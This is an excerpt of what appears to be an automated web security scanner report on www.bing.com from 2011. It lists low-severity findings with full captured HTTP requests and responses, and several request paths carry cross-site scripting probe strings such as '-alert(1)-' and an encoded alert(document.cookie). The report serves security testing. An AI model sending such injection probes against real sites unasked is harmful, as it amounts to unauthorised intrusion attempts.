GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2fmaps%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 19246
Date: Sat, 26 Mar 2011 00:55:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,33.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,35.1')">Hotmail</a>
...[SNIP]...
to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808441.aspx" onmousedown="return si_T('&amp;ID=SERP,111.1')">filtering offensive sites</a> and <a href="http://www.microsoft.com/protect/default.aspx" onmousedown="return si_T('&amp;ID=SERP,112.1')">staying safe online</a>
...[SNIP]...
</strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com/0fsenus4/Client" onmousedown="return si_T('&amp;ID=SERP,113.1')">Windows Live Family Safety</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,47.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,49.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,51.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,53.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,55.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,57.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatsettings&amp;P2=&amp;P3=ecalgobadge2&amp;P4=SEFD1&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington%2c+District+Of+Columbia&amp;P7=Original&amp;P8=&amp;P9=38.9069%2f-77.0284&amp;P10=24902&amp;P11=&amp;P12=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2fsettings.aspx%3fru%3dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,59.1')">Tell us what you think</a>
...[SNIP]...

3.12. http://www.bing.com/settings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2fmaps%2f&SH=1&FORM=SEFD HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 19336
Date: Sat, 26 Mar 2011 00:56:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,33.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,35.1')">Hotmail</a>
...[SNIP]...
to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808441.aspx" onmousedown="return si_T('&amp;ID=SERP,111.1')">filtering offensive sites</a> and <a href="http://www.microsoft.com/protect/default.aspx" onmousedown="return si_T('&amp;ID=SERP,112.1')">staying safe online</a>
...[SNIP]...
</strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com/0fsenus4/Client" onmousedown="return si_T('&amp;ID=SERP,113.1')">Windows Live Family Safety</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,47.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,49.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,51.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,53.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,55.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,57.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatsettings&amp;P2=&amp;P3=ecalgobadge2&amp;P4=SEFD&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington%2c+District+Of+Columbia&amp;P7=Original&amp;P8=&amp;P9=38.9069%2f-77.0284&amp;P10=24902&amp;P11=&amp;P12=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2fsettings.aspx%3fru%3dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%26SH%3d1%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,59.1')">Tell us what you think</a>
...[SNIP]...

3.13. http://www.bing.com/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLS HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=I=1&TS=1301101384

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 8365
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,86.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,88.1')">Hotmail</a>
...[SNIP]...
<li>Find more search tips in <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" onmousedown="return si_T('&amp;ID=FD,111.1')">Help</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,99.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,101.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,103.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,105.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,107.1')">About our ads</a>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 7 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.bing.com/local/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c63219ddd680488b82098c61239970e8
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local
Content-Length: 32170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

4.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b7afce04e6d2437594326ff9a9979381
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js
Content-Length: 23624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

4.3. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(1)-'6f0e1fe887b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(1)-'6f0e1fe887b HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/aa461'-alert(1)-'6f0e1fe887b/
X-BM-TraceID: 2a28fc725dfd4392bafb62ac203ea6a3
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1301101434; domain=.bing.com; path=/
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/aa461'-alert(1)-'6f0e1fe887b/">here</a>.</h2>
</body></html>

4.4. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(1)-'6f0e1fe887b/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(1)-'6f0e1fe887b/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=I=1&TS=1301101313

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 22448f9569dd40058bf1fdb9c0ff6c45
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(1)-'6f0e1fe887b
Content-Length: 22932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

4.5. http://www.bing.com/local/us/dc/washington/restaurants/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; BID=53585a90f348495cbe705d0124981ec0; VE_LSV=cache=0; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 147c0045befc4bdcb48dadffb4dcce83
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 91062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

4.6. http://www.bing.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL=true; htsk=false; cbout=false; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1693482&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=I=1&TS=1301100909

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/maps/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 00:55:10 GMT
Connection: close
Set-Cookie: _HOP=I=2&TS=1301100910; domain=.bing.com; path=/


4.7. http://www.bing.com/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=9557F8C0DAF347BDB5B78C82AB37BFF1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 01:24:09 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 25-Mar-2013 01:24:09 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1301102649; domain=.bing.com; path=/


5. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://www.bing.com/travel/jsxc.vjs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/jsxc.vjs

Issue detail

The following email addresses were disclosed in the response:

Request

GET /travel/jsxc.vjs?p=validation.js%3bfunctions.js%3bomnitureUtils.js%3bforms%2fflightSearchForm.js%3bforms%2fhotelSearchForm.js%3bproducts%2fproducts.js%3bforms%2fflexSearchForm.js%3bforms%2fflexSearchFormMap.js%3bcalendar%2ffc_cal.js%3bvips%2f*.js%3bhome%2fhome.js%3btracking%2fClassBasedTracking.js%3bblink%2fblinkCode.js%3bblink%2fsuggestedSearches.js%3bdatefunctions.js&v=5.10.2.6-1299886677914 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/?cid=homenav&FORM=Z9LH5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=1; ETID=BCID-z168rde13ifflcyz5fi936uodfqq4_VID-z79jcagaeglducyz4dt98uemfbiss_UID-; JSESSIONID=EB05C7B008A25DA50D3A0077DD534D37; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
